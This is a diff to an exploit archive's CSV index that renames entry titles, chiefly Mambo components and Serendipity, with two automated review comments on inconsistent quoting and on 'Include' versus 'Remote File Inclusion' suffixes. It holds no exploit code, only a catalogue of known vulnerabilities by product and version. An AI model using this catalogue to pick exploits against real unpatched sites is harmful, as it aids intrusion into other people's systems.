diff --git a/files.csv b/files.csv
index dc59f29de..24e0859e5 100755
--- a/files.csv
+++ b/files.csv
@@ -431,7 +431,7 @@ id,file,description,date,author,platform,type,port
 558,platforms/windows/local/558.c,"WinRAR 1.0 - Local Buffer Overflow",2004-09-28,ATmaCA,windows,local,0
 559,platforms/windows/local/559.c,"Zinf Audio Player 2.2.1 - Local Buffer Overflow",2004-09-28,Delikon,windows,local,0
 560,platforms/windows/local/560.txt,"GlobalScape - CuteFTP macros (.mcr) Local",2004-09-28,ATmaCA,windows,local,0
-561,platforms/php/webapps/561.sh,"Serendipity 0.7-beta1 - SQL Injection (PoC)",2004-09-28,aCiDBiTS,php,webapps,0
+561,platforms/php/webapps/561.sh,"S9Y Serendipity 0.7-beta1 - SQL Injection (PoC)",2004-09-28,aCiDBiTS,php,webapps,0
 562,platforms/windows/dos/562.c,"MSSQL 7.0 - Remote Denial of Service",2004-09-29,"securma massine",windows,dos,0
 565,platforms/php/webapps/565.txt,"Silent Storm Portal - Multiple Vulnerabilities",2004-09-30,"CHT Security Research",php,webapps,0
 566,platforms/windows/remote/566.pl,"IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow",2004-10-04,LoWNOISE,windows,remote,80
@@ -758,7 +758,7 @@ id,file,description,date,author,platform,type,port
 936,platforms/windows/local/936.c,"DeluxeFtp 6.x - Local Password Disclosure",2005-04-13,Kozan,windows,local,0
 937,platforms/windows/local/937.c,"BitComet 0.57 - Local Proxy Password Disclosure",2005-04-13,Kozan,windows,local,0
 938,platforms/windows/local/938.cpp,"Microsoft Windows - 'HTA' Script Execution Exploit (MS05-016)",2005-04-14,ZwelL,windows,local,0
-939,platforms/php/webapps/939.pl,"Serendipity 0.8beta4 - exit.php SQL Injection",2005-04-13,kre0n,php,webapps,0
+939,platforms/php/webapps/939.pl,"S9Y Serendipity 0.8beta4 - exit.php SQL Injection",2005-04-13,kre0n,php,webapps,0
 940,platforms/linux/remote/940.c,"Sumus 0.2.2 - httpd Remote Buffer Overflow",2005-04-14,vade79,linux,remote,81
 941,platforms/windows/dos/941.c,"Yager 5.24 - Multiple Denial of Service",2005-04-14,"Luigi Auriemma",windows,dos,0
 942,platforms/windows/dos/942.c,"Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos,0
@@ -1666,8 +1666,8 @@ id,file,description,date,author,platform,type,port
 1952,platforms/php/webapps/1952.txt,"THoRCMS 1.3.1 - 'phpbb_root_path' Remote File Inclusion",2006-06-25,Kw3[R]Ln,php,webapps,0
 1953,platforms/php/webapps/1953.pl,"DeluxeBB 1.07 - (cp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0
 1954,platforms/php/webapps/1954.pl,"DreamAccount 3.1 - (auth.api.php) Remote File Inclusion",2006-06-25,CrAsh_oVeR_rIdE,php,webapps,0
-1955,platforms/php/webapps/1955.txt,"CBSms Mambo Module 1.0 - Remote File Inclusion",2006-06-26,Kw3[R]Ln,php,webapps,0
-1956,platforms/php/webapps/1956.txt,"Pearl For Mambo 1.6 - Multiple Remote File Inclusion",2006-06-27,Kw3[R]Ln,php,webapps,0
+1955,platforms/php/webapps/1955.txt,"Mambo Module CBSms 1.0 - Remote File Inclusion",2006-06-26,Kw3[R]Ln,php,webapps,0
+1956,platforms/php/webapps/1956.txt,"Mambo Component Pearl 1.6 - Multiple Remote File Inclusion",2006-06-27,Kw3[R]Ln,php,webapps,0
 1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - (forumid) SQL Injection",2006-06-27,simo64,php,webapps,0
 1958,platforms/windows/local/1958.pl,"Microsoft Excel 2003 - Hlink Stack/Buffer Overflow (SEH)",2006-06-27,FistFuXXer,windows,local,0
 1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 - (rsgallery.html.php) File Inclusion",2006-06-28,marriottvn,php,webapps,0
@@ -1690,7 +1690,7 @@ id,file,description,date,author,platform,type,port
 1977,platforms/windows/dos/1977.cpp,"Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow",2006-07-02,RunningBon,windows,dos,0
 1978,platforms/windows/local/1978.pl,"Microsoft Excel - Universal Hlink Local Buffer Overflow",2006-07-02,"SYS 49152",windows,local,0
 1980,platforms/windows/dos/1980.pl,"ImgSvr 0.6.5 - (long http post) Denial of Service",2006-07-04,n00b,windows,dos,0
-1981,platforms/php/webapps/1981.txt,"galleria Mambo Module 1.0b - Remote File Inclusion",2006-07-04,sikunYuk,php,webapps,0
+1981,platforms/php/webapps/1981.txt,"Mambo Module galleria 1.0b - Remote File Inclusion",2006-07-04,sikunYuk,php,webapps,0
 1982,platforms/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Inclusion",2006-07-04,OLiBekaS,php,webapps,0
 1983,platforms/php/webapps/1983.txt,"MyPHP CMS 0.3 - (domain) Remote File Inclusion",2006-07-05,Kw3[R]Ln,php,webapps,0
 1984,platforms/windows/dos/1984.py,"WinRAR 3.60 Beta 6 - (SFX Path) Stack Overflow",2006-07-05,posidron,windows,dos,0
@@ -1703,8 +1703,8 @@ id,file,description,date,author,platform,type,port
 1991,platforms/php/webapps/1991.php,"Pivot 1.30 RC2 - Privilege Escalation / Remote Code Execution",2006-07-07,rgod,php,webapps,0
 1992,platforms/windows/local/1992.py,"WinRAR 3.60 Beta 6 - (SFX Path) Local Stack Overflow (French)",2006-07-07,"Jerome Athias",windows,local,0
 1993,platforms/php/webapps/1993.php,"PAPOO 3_RC3 - SQL Injection / Admin Credentials Disclosure",2006-07-07,rgod,php,webapps,0
-1994,platforms/php/webapps/1994.txt,"SimpleBoard Mambo Component 1.1.0 - Remote File Inclusion",2006-07-08,h4ntu,php,webapps,0
-1995,platforms/php/webapps/1995.txt,"com_forum Mambo Component 1.2.4RC3 - Remote File Inclusion",2006-07-08,h4ntu,php,webapps,0
+1994,platforms/php/webapps/1994.txt,"Mambo Component SimpleBoard 1.1.0 - Remote File Inclusion",2006-07-08,h4ntu,php,webapps,0
+1995,platforms/php/webapps/1995.txt,"Mambo Component com_forum 1.2.4RC3 - Remote File Inclusion",2006-07-08,h4ntu,php,webapps,0
 1996,platforms/php/webapps/1996.txt,"Sabdrimer PRO 2.2.4 - (pluginpath) Remote File Inclusion",2006-07-09,A.nosrati,php,webapps,0
 1997,platforms/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP)",2006-07-09,joffer,multiple,remote,10000
 1998,platforms/php/webapps/1998.pl,"Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (2)",2006-07-09,"Jacek Wlodarczyk",php,webapps,0
@@ -1729,17 +1729,17 @@ id,file,description,date,author,platform,type,port
 2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)",2006-07-15,UmZ,multiple,remote,10000
 2018,platforms/php/webapps/2018.txt,"FlushCMS 1.0.0-pre2 - (class.rich.php) Remote File Inclusion",2006-07-16,igi,php,webapps,0
 2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod 1.2 - (m2f_root_path) Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0
-2020,platforms/php/webapps/2020.txt,"com_videodb Mambo Component 0.3en - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0
-2021,platforms/php/webapps/2021.txt,"SMF Forum Mambo Component 1.3.1.3 - Include",2006-07-17,ASIANEAGLE,php,webapps,0
-2022,platforms/php/webapps/2022.txt,"com_extcalendar Mambo Component 2.0 - Include",2006-07-17,OLiBekaS,php,webapps,0
-2023,platforms/php/webapps/2023.txt,"com_loudmouth Mambo Component 4.0j - Include",2006-07-17,h4ntu,php,webapps,0
-2024,platforms/php/webapps/2024.txt,"pc_cookbook Mambo Component 0.3 - Include",2006-07-17,Matdhule,php,webapps,0
-2025,platforms/php/webapps/2025.txt,"perForms Mambo Component 1.0 - Remote File Inclusion",2006-07-17,endeneu,php,webapps,0
-2026,platforms/php/webapps/2026.txt,"com_hashcash Mambo Component 1.2.1 - Include",2006-07-17,Matdhule,php,webapps,0
-2027,platforms/php/webapps/2027.txt,"HTMLArea3 Mambo Module 1.5 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0
-2028,platforms/php/webapps/2028.txt,"Sitemap Mambo Component 2.0.0 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0
-2029,platforms/php/webapps/2029.txt,"pollxt Mambo Component 1.22.07 - Remote File Inclusion",2006-07-17,vitux,php,webapps,0
-2030,platforms/php/webapps/2030.txt,"MiniBB Mambo Component 1.5a - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0
+2020,platforms/php/webapps/2020.txt,"Mambo Component com_videodb 0.3en - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0
+2021,platforms/php/webapps/2021.txt,"Mambo Component SMF Forum 1.3.1.3 - Remote File Inclusion",2006-07-17,ASIANEAGLE,php,webapps,0
+2022,platforms/php/webapps/2022.txt,"Mambo Component 'com_extcalendar' 2.0 - Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0
+2023,platforms/php/webapps/2023.txt,"Mambo Component com_loudmouth 4.0j - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0
+2024,platforms/php/webapps/2024.txt,"Mambo Component pc_cookbook 0.3 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0
+2025,platforms/php/webapps/2025.txt,"Mambo Component perForms 1.0 - Remote File Inclusion",2006-07-17,endeneu,php,webapps,0
+2026,platforms/php/webapps/2026.txt,"Mambo Component com_hashcash 1.2.1 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0
+2027,platforms/php/webapps/2027.txt,"Mambo Module HTMLArea3 1.5 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0
+2028,platforms/php/webapps/2028.txt,"Mambo Component Sitemap 2.0.0 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0
+2029,platforms/php/webapps/2029.txt,"Mambo Component pollxt 1.22.07 - Remote File Inclusion",2006-07-17,vitux,php,webapps,0
+2030,platforms/php/webapps/2030.txt,"Mambo Component MiniBB 1.5a - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0
 2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'logrotate prctl()' Privilege Escalation",2006-07-18,"Marco Ivaldi",linux,local,0
 2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Blind SQL Injection",2006-07-18,"Jacek Wlodarczyk",php,webapps,0
 2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - SQL Injection (2)",2006-07-18,"w4g.not null",php,webapps,0
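Review bot: Component identifiers are quoted inconsistently in the new titles: 2022 becomes `'com_extcalendar'` while 2020, 2023 and 2026 in the same hunk stay bare (`com_videodb`, `com_loudmouth`, `com_hashcash`). The same mix shows up in later hunks, with 2078, 2085, 2206, 2207 and 3557 quoted and 2222, 2225, 2367, 2379 and 2852 bare. Anyone matching titles by exact phrase or pattern to map installed components to known entries gets different hits depending on which form a row happened to receive. Pick one form and apply it to every `com_*` row touched here, e.g. `"Mambo Component 'com_videodb' 0.3en - Remote File Inclusion"`.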
@@ -1763,14 +1763,14 @@ id,file,description,date,author,platform,type,port
 2059,platforms/hardware/dos/2059.cpp,"D-Link Router - UPNP Stack Overflow Denial of Service (PoC)",2006-07-22,ub3rst4r,hardware,dos,0
 2060,platforms/php/webapps/2060.txt,"PHP Live! 3.2.1 - (help.php) Remote File Inclusion",2006-07-23,magnific,php,webapps,0
 2061,platforms/multiple/remote/2061.txt,"Apache Tomcat < 5.5.17 - Remote Directory Listing",2006-07-23,"ScanAlert Security",multiple,remote,0
-2062,platforms/php/webapps/2062.txt,"MoSpray Mambo Component 18RC1 - Remote File Inclusion",2006-07-23,"Kurdish Security",php,webapps,0
+2062,platforms/php/webapps/2062.txt,"Mambo Component MoSpray 18RC1 - Remote File Inclusion",2006-07-23,"Kurdish Security",php,webapps,0
 2063,platforms/php/webapps/2063.txt,"ArticlesOne 07232006 - (page) Remote File Inclusion",2006-07-23,CyberLord,php,webapps,0
-2064,platforms/php/webapps/2064.txt,"Mam-Moodle Mambo Component alpha - Remote File Inclusion",2006-07-23,jank0,php,webapps,0
+2064,platforms/php/webapps/2064.txt,"Mambo Component Mam-Moodle alpha - Remote File Inclusion",2006-07-23,jank0,php,webapps,0
 2065,platforms/windows/local/2065.c,"Cheese Tracker 0.9.9 - Local Buffer Overflow (PoC)",2006-07-23,"Luigi Auriemma",windows,local,0
-2066,platforms/php/webapps/2066.txt,"multibanners Mambo Component 1.0.1 - Remote File Inclusion",2006-07-23,Blue|Spy,php,webapps,0
+2066,platforms/php/webapps/2066.txt,"Mambo Component multibanners 1.0.1 - Remote File Inclusion",2006-07-23,Blue|Spy,php,webapps,0
 2067,platforms/solaris/local/2067.c,"Solaris 10 sysinfo() - Local Kernel Memory Disclosure",2006-07-24,prdelka,solaris,local,0
 2068,platforms/php/webapps/2068.php,"X7 Chat 2.0.4 - (old_prefix) Blind SQL Injection",2006-07-24,rgod,php,webapps,0
-2069,platforms/php/webapps/2069.txt,"PrinceClan Chess Mambo Com 0.8 - Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0
+2069,platforms/php/webapps/2069.txt,"Mambo Component PrinceClan Chess 0.8 - Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0
 2070,platforms/windows/remote/2070.pl,"SIPfoundry sipXtapi - (CSeq) Remote Buffer Overflow",2006-07-24,"Jacopo Cervini",windows,remote,5060
 2071,platforms/php/webapps/2071.php,"Etomite CMS 0.6.1 - 'Username' SQL Injection (mq = off)",2006-07-25,rgod,php,webapps,0
 2072,platforms/php/webapps/2072.php,"Etomite CMS 0.6.1 - (rfiles.php) Remote Command Execution",2006-07-25,rgod,php,webapps,0
@@ -1779,18 +1779,18 @@ id,file,description,date,author,platform,type,port
 2075,platforms/windows/remote/2075.pm,"eIQnetworks License Manager - Remote Buffer Overflow (2) (Metasploit)",2006-07-26,ri0t,windows,remote,0
 2076,platforms/windows/remote/2076.pl,"AIM Triton 1.0.4 - (SipXtapi) Remote Buffer Overflow (PoC)",2006-07-26,c0rrupt,windows,remote,5061
 2077,platforms/php/webapps/2077.txt,"WMNews 0.2a - (base_datapath) Remote File Inclusion",2006-07-27,uNfz,php,webapps,0
-2078,platforms/php/webapps/2078.txt,"a6mambohelpdesk Mambo Component 18RC1 - Include",2006-07-27,Dr.Jr7,php,webapps,0
+2078,platforms/php/webapps/2078.txt,"Mambo Component 'com_a6mambohelpdesk' 18RC1 - Remote File Inclusion",2006-07-27,Dr.Jr7,php,webapps,0
 2079,platforms/windows/remote/2079.pl,"eIQnetworks ESA - (Syslog Server) Remote Buffer Overflow",2006-07-27,"Kevin Finisterre",windows,remote,12345
 2080,platforms/windows/remote/2080.pl,"eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)",2006-07-27,"Kevin Finisterre",windows,remote,10616
 2081,platforms/php/webapps/2081.txt,"Portail PHP 1.7 - (chemin) Remote File Inclusion",2006-07-27,"Mehmet Ince",php,webapps,0
 2082,platforms/multiple/remote/2082.html,"Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution (PoC)",2006-07-28,"H D Moore",multiple,remote,0
-2083,platforms/php/webapps/2083.txt,"Mambo Security Images Component 3.0.5 - Inclusion",2006-07-28,Drago84,php,webapps,0
-2084,platforms/php/webapps/2084.txt,"Mambo MGM Component 0.95r2 - Remote File Inclusion",2006-07-28,"A-S-T TEAM",php,webapps,0
-2085,platforms/php/webapps/2085.txt,"Mambo Colophon Component 1.2 - Remote File Inclusion",2006-07-29,Drago84,php,webapps,0
-2086,platforms/php/webapps/2086.txt,"Mambo mambatStaff Component 3.1b - Remote File Inclusion",2006-07-29,Dr.Jr7,php,webapps,0
+2083,platforms/php/webapps/2083.txt,"Mambo Component Security Images 3.0.5 - Inclusion",2006-07-28,Drago84,php,webapps,0
+2084,platforms/php/webapps/2084.txt,"Mambo Component MGM 0.95r2 - Remote File Inclusion",2006-07-28,"A-S-T TEAM",php,webapps,0
+2085,platforms/php/webapps/2085.txt,"Mambo Component 'com_colophon' 1.2 - Remote File Inclusion",2006-07-29,Drago84,php,webapps,0
+2086,platforms/php/webapps/2086.txt,"Mambo Component mambatStaff 3.1b - Remote File Inclusion",2006-07-29,Dr.Jr7,php,webapps,0
 2087,platforms/php/webapps/2087.php,"vbPortal 3.0.2 <= 3.6.0 b1 - 'cookie' Remote Code Execution",2006-07-29,r00t,php,webapps,0
 2088,platforms/php/webapps/2088.php,"ATutor 1.5.3.1 - 'links' Blind SQL Injection",2006-07-30,rgod,php,webapps,0
-2089,platforms/php/webapps/2089.txt,"Mambo User Home Pages Component 0.5 - Remote File Inclusion",2006-07-30,"Kurdish Security",php,webapps,0
+2089,platforms/php/webapps/2089.txt,"Mambo Component User Home Pages 0.5 - Remote File Inclusion",2006-07-30,"Kurdish Security",php,webapps,0
 2090,platforms/php/webapps/2090.txt,"Joomla! Component com_bayesiannaivefilter 1.1 - Inclusion",2006-07-30,Pablin77,php,webapps,0
 2091,platforms/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 - Local Code Execution (French)",2006-07-30,NSRocket,windows,local,0
 2092,platforms/php/webapps/2092.txt,"Joomla! Component LMO 1.0b2 - Remote File Inclusion",2006-07-30,vitux,php,webapps,0
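Review bot: Row 2083 is rewritten but still ends in the bare class `- Inclusion`, whereas 2078 in this hunk (and 2021–2026 earlier) had `Include` normalised to `Remote File Inclusion`. The vulnerability-class suffix is what people filter on when triaging, so a half-normalised row is easy to miss in a search for "Remote File Inclusion". If 2083.txt is a remote include like its neighbours (not verifiable from this diff), the title should read `"Mambo Component Security Images 3.0.5 - Remote File Inclusion"`. Rows 2206, 2207, 2225 and 2367 in later hunks keep `File Inclusion` without a local/remote qualifier and deserve the same check.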
@@ -1870,7 +1870,7 @@ id,file,description,date,author,platform,type,port
 2169,platforms/php/webapps/2169.txt,"Chaussette 080706 - (_BASE) Remote File Inclusion",2006-08-10,Drago84,php,webapps,0
 2170,platforms/php/webapps/2170.txt,"VWar 1.50 R14 - (online.php) SQL Injection",2006-08-10,brOmstar,php,webapps,0
 2171,platforms/php/webapps/2171.txt,"WEBInsta MM 1.3e - (cabsolute_path) Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0
-2172,platforms/php/webapps/2172.txt,"Mambo Remository Component 3.25 - Remote File Inclusion",2006-08-10,camino,php,webapps,0
+2172,platforms/php/webapps/2172.txt,"Mambo Component Remository 3.25 - Remote File Inclusion",2006-08-10,camino,php,webapps,0
 2173,platforms/php/webapps/2173.txt,"MVCnPHP 3.0 - glConf[path_libraries] Remote File Inclusion",2006-08-10,Drago84,php,webapps,0
 2174,platforms/php/webapps/2174.txt,"Wheatblog 1.1 - (session.php) Remote File Inclusion",2006-08-11,O.U.T.L.A.W,php,webapps,80
 2175,platforms/php/webapps/2175.txt,"WEBInsta CMS 0.3.1 - (templates_dir) Remote File Inclusion",2006-08-12,K-159,php,webapps,0
@@ -1880,9 +1880,9 @@ id,file,description,date,author,platform,type,port
 2179,platforms/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service",2006-08-13,Preddy,multiple,dos,0
 2180,platforms/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service (Python)",2006-08-13,Preddy,multiple,dos,0
 2181,platforms/php/webapps/2181.pl,"PHPay 2.02 - (nu_mail.inc.php) Remote mail() Injection",2006-08-14,beford,php,webapps,80
-2182,platforms/php/webapps/2182.txt,"Mambo mmp Component 1.2 - Remote File Inclusion",2006-08-14,mdx,php,webapps,0
+2182,platforms/php/webapps/2182.txt,"Mambo Component MMP 1.2 - Remote File Inclusion",2006-08-14,mdx,php,webapps,0
 2183,platforms/php/webapps/2183.txt,"ProjectButler 0.8.4 - (rootdir) Remote File Inclusion",2006-08-14,"the master",php,webapps,0
-2184,platforms/php/webapps/2184.txt,"Mambo Peoplebook Component 1.0 - Remote File Inclusion",2006-08-14,Matdhule,php,webapps,0
+2184,platforms/php/webapps/2184.txt,"Mambo Component Peoplebook 1.0 - Remote File Inclusion",2006-08-14,Matdhule,php,webapps,0
 2185,platforms/linux/remote/2185.pl,"Cyrus IMAPD 2.3.2 - (pop3d) Remote Buffer Overflow (3)",2006-08-14,K-sPecial,linux,remote,110
 2186,platforms/asp/webapps/2186.txt,"Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (1)",2006-08-14,ASIANEAGLE,asp,webapps,0
 2187,platforms/php/webapps/2187.htm,"WEBInsta MM 1.3e - 'absolute_path' Remote File Inclusion",2006-08-15,str0ke,php,webapps,0
@@ -1894,35 +1894,35 @@ id,file,description,date,author,platform,type,port
 2193,platforms/linux/local/2193.php,"PHP 4.4.3 / 5.1.4 - (sscanf) Local Buffer Overflow",2006-08-16,Andi,linux,local,0
 2194,platforms/windows/dos/2194.pl,"Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (1)",2006-08-16,Preddy,windows,dos,0
 2195,platforms/windows/dos/2195.html,"VMware 5.5.1 - COM Object Arbitrary Partition Table Delete Exploit",2006-08-16,nop,windows,dos,0
-2196,platforms/php/webapps/2196.txt,"Mambo CopperminePhotoGalery Component - Remote File Inclusion",2006-08-16,k1tk4t,php,webapps,0
+2196,platforms/php/webapps/2196.txt,"Mambo Component CopperminePhotoGalery - Remote File Inclusion",2006-08-16,k1tk4t,php,webapps,0
 2198,platforms/php/webapps/2198.php,"CubeCart 3.0.11 - (oid) Blind SQL Injection",2006-08-17,rgod,php,webapps,0
 2199,platforms/php/webapps/2199.txt,"IRSR 0.2 - (_sysSessionPath) Remote File Inclusion",2006-08-17,Kacper,php,webapps,0
 2200,platforms/php/webapps/2200.txt,"WTcom 0.2.4-alpha - (torrents.php) SQL Injection",2006-08-17,sh1r081,php,webapps,0
 2201,platforms/php/webapps/2201.txt,"POWERGAP 2003 - 's0x.php' Remote File Inclusion",2006-08-17,"Saudi Hackrz",php,webapps,0
-2202,platforms/php/webapps/2202.txt,"Mambo mambelfish Component 1.1 - Remote File Inclusion",2006-08-17,mdx,php,webapps,0
+2202,platforms/php/webapps/2202.txt,"Mambo Component mambelfish 1.1 - Remote File Inclusion",2006-08-17,mdx,php,webapps,0
 2203,platforms/php/webapps/2203.txt,"Joomla! Component com_jim 1.0.1 - Remote File Inclusion",2006-08-17,"Mehmet Ince",php,webapps,0
 2204,platforms/windows/dos/2204.c,"Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (3)",2006-08-17,Preddy,windows,dos,0
 2205,platforms/php/webapps/2205.txt,"Joomla! Component Mosets Tree 1.0 - Remote File Inclusion",2006-08-17,Crackers_Child,php,webapps,0
-2206,platforms/php/webapps/2206.txt,"Mambo phpShop Component 1.2 RC2b - File Inclusion",2006-08-17,Cmaster4,php,webapps,0
-2207,platforms/php/webapps/2207.txt,"Mambo a6mambocredits Component 1.0.0 - File Inclusion",2006-08-17,Cmaster4,php,webapps,0
+2206,platforms/php/webapps/2206.txt,"Mambo Component 'com_phpshop' 1.2 RC2b - File Inclusion",2006-08-17,Cmaster4,php,webapps,0
+2207,platforms/php/webapps/2207.txt,"Mambo Component 'com_a6mambocredits' 1.0.0 - File Inclusion",2006-08-17,Cmaster4,php,webapps,0
 2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 - (IE Plugin) Remote Denial of Service Crash",2006-08-18,Mr.Niega,windows,dos,0
 2209,platforms/php/webapps/2209.txt,"Joomla! Component Artlinks 1.0b4 - Remote File Inclusion",2006-08-18,camino,php,webapps,0
 2210,platforms/windows/dos/2210.c,"Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (2)",2006-08-18,vegas78,windows,dos,0
 2211,platforms/php/webapps/2211.txt,"PHlyMail Lite 3.4.4 - (mod.listmail.php) Remote File Inclusion",2006-08-18,Kacper,php,webapps,0
 2212,platforms/php/webapps/2212.txt,"phpCodeGenie 3.0.2 - (BEAUT_PATH) Remote File Inclusion",2006-08-18,Kacper,php,webapps,0
-2213,platforms/php/webapps/2213.txt,"Mambo MamboWiki Component 0.9.6 - Remote File Inclusion",2006-08-18,camino,php,webapps,0
+2213,platforms/php/webapps/2213.txt,"Mambo Component MamboWiki 0.9.6 - Remote File Inclusion",2006-08-18,camino,php,webapps,0
 2214,platforms/php/webapps/2214.txt,"Joomla! Component Link Directory 1.0.3 - Remote File Inclusion",2006-08-18,camino,php,webapps,0
 2215,platforms/php/webapps/2215.txt,"Joomla! Component Kochsuite 0.9.4 - Remote File Inclusion",2006-08-18,camino,php,webapps,0
 2216,platforms/php/webapps/2216.txt,"Sonium Enterprise Adressbook 0.2 - (folder) Include",2006-08-18,"Philipp Niedziela",php,webapps,0
-2217,platforms/php/webapps/2217.txt,"Mambo cropimage Component 1.0 - Remote File Inclusion",2006-08-19,"Mehmet Ince",php,webapps,0
+2217,platforms/php/webapps/2217.txt,"Mambo Component cropimage 1.0 - Remote File Inclusion",2006-08-19,"Mehmet Ince",php,webapps,0
 2218,platforms/php/webapps/2218.txt,"interact 2.2 - (CONFIG[base_path]) Remote File Inclusion",2006-08-19,Kacper,php,webapps,0
 2219,platforms/php/webapps/2219.php,"Joomla! Component Poll 1.0.10 - Arbitrary Add Votes Exploit",2006-08-19,trueend5,php,webapps,0
 2220,platforms/php/webapps/2220.txt,"Tutti Nova 1.6 - (TNLIB_DIR) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0
 2221,platforms/php/webapps/2221.txt,"Fantastic News 2.1.3 - (script_path) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0
-2222,platforms/php/webapps/2222.txt,"Mambo com_lurm_constructor Component 0.6b - Include",2006-08-19,mdx,php,webapps,0
+2222,platforms/php/webapps/2222.txt,"Mambo Component com_lurm_constructor 0.6b - Remote File Inclusion",2006-08-19,mdx,php,webapps,0
 2223,platforms/windows/remote/2223.c,"Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139
 2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat 3.1 - 'adminlog' Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0
-2225,platforms/php/webapps/2225.txt,"mambo com_babackup Component 1.1 - File Inclusion",2006-08-19,mdx,php,webapps,0
+2225,platforms/php/webapps/2225.txt,"Mambo Component com_babackup 1.1 - File Inclusion",2006-08-19,mdx,php,webapps,0
 2226,platforms/php/webapps/2226.txt,"NES Game and NES System c108122 - File Inclusion",2006-08-20,Kacper,php,webapps,0
 2227,platforms/php/webapps/2227.txt,"SportsPHool 1.0 - (mainnav) Remote File Inclusion",2006-08-20,Kacper,php,webapps,0
 2228,platforms/asp/webapps/2228.txt,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (1)",2006-08-20,"Chironex Fleckeri",asp,webapps,0
@@ -2064,7 +2064,7 @@ id,file,description,date,author,platform,type,port
 2364,platforms/php/webapps/2364.txt,"KnowledgeBuilder 2.2 - (visEdit_root) Remote File Inclusion",2006-09-13,igi,php,webapps,0
 2365,platforms/php/webapps/2365.txt,"Newsscript 0.5 - Remote File Inclusion / Local File Inclusion",2006-09-13,"Daftrix Security",php,webapps,0
 2366,platforms/php/webapps/2366.txt,"phpQuiz 0.1 - (pagename) Remote File Inclusion",2006-09-14,Solpot,php,webapps,0
-2367,platforms/php/webapps/2367.txt,"Mambo com_serverstat Component 0.4.4 - File Inclusion",2006-09-14,"Mehmet Ince",php,webapps,0
+2367,platforms/php/webapps/2367.txt,"Mambo Component com_serverstat 0.4.4 - File Inclusion",2006-09-14,"Mehmet Ince",php,webapps,0
 2368,platforms/php/webapps/2368.txt,"TeamCal Pro 2.8.001 - (app_root) Remote File Inclusion",2006-09-14,PSYCH@,php,webapps,0
 2369,platforms/php/webapps/2369.txt,"PhotoPost 4.6 - (PP_PATH) Remote File Inclusion",2006-09-15,"Saudi Hackrz",php,webapps,0
 2370,platforms/php/webapps/2370.php,"Limbo CMS 1.0.4.2L - (com_contact) Remote Code Execution",2006-09-15,rgod,php,webapps,0
@@ -2072,11 +2072,11 @@ id,file,description,date,author,platform,type,port
 2372,platforms/php/webapps/2372.txt,"BolinOS 4.5.5 - (gBRootPath) Remote File Inclusion",2006-09-15,"Mehmet Ince",php,webapps,0
 2373,platforms/php/webapps/2373.txt,"PHP DocWriter 0.3 - (script) Remote File Inclusion",2006-09-15,Kacper,php,webapps,0
 2374,platforms/php/webapps/2374.pl,"Site@School 2.4.02 - Arbitrary File Upload",2006-09-15,simo64,php,webapps,0
-2375,platforms/php/webapps/2375.txt,"Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Include",2006-09-15,3l3ctric-Cracker,php,webapps,0
+2375,platforms/php/webapps/2375.txt,"Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Remote File Inclusion",2006-09-15,3l3ctric-Cracker,php,webapps,0
 2376,platforms/php/webapps/2376.pl,"phpQuiz 0.1.2 - SQL Injection / Code Execution",2006-09-16,simo64,php,webapps,0
 2377,platforms/php/webapps/2377.txt,"aeDating 4.1 - dir[inc] Remote File Inclusion",2006-09-16,NeXtMaN,php,webapps,0
 2378,platforms/php/webapps/2378.php,"GNUTURK 2G - (t_id) SQL Injection",2006-09-16,p2y,php,webapps,0
-2379,platforms/php/webapps/2379.txt,"Mambo com_registration_detailed 4.1 - Remote File Inclusion",2006-09-16,k1tk4t,php,webapps,0
+2379,platforms/php/webapps/2379.txt,"Mambo Component com_registration_detailed 4.1 - Remote File Inclusion",2006-09-16,k1tk4t,php,webapps,0
